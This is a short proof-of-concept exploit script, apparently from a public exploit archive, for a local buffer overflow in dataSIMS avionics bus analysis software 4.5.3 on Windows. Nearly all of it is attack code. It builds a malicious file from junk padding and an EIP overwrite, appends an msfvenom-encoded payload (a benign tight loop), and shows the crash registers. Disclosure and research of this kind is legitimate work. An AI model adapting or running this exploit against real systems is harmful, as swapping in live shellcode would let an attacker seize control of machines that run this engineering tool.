# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC) # Exploit Author: Kağan Çapar # Date: 2020-02-17 # Vendor Homepage: https://www.ddc-web.com/ # Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414 # Version: 4.5.3 # Tested On: Windows 10 Enterprise (x64) # about Sofware: # dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort. # about ARINC 664-1: # ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. # Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®). #!/usr/bin/env python # -*- coding: UTF-8 -*- import struct import binascii import os import sys #EAX : 00000000 #EBX : 00000000 #ECX : 42424242 #EDX : 77B96330 ntdll.77B96330 #EBP : 000A1328 #ESP : 000A1308 #ESI : 00000000 #EDI : 00000000 #EIP : 42424242 #EFLAGS : 00010246 #LastError : 00000000 (ERROR_SUCCESS) #LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND) #Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)! file = open("milstd1553result.txt", "w") junk = "\x41" * 600 align = "\x32" * 4 + "\x31" * 4 prop = "\x43" * 380 imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32" imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a" #EIP Overwrite junk value overwrite = "\x42" * 4 #Payload size: 29 bytes #Final size of py file: 160 bytes #msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai buf = b"" buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33" buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9" buf += b"\x8b\x7c\x9c" win32 = junk + align + prop + imp + imp2 + overwrite + buf print len(win32) file.write(win32) file.close()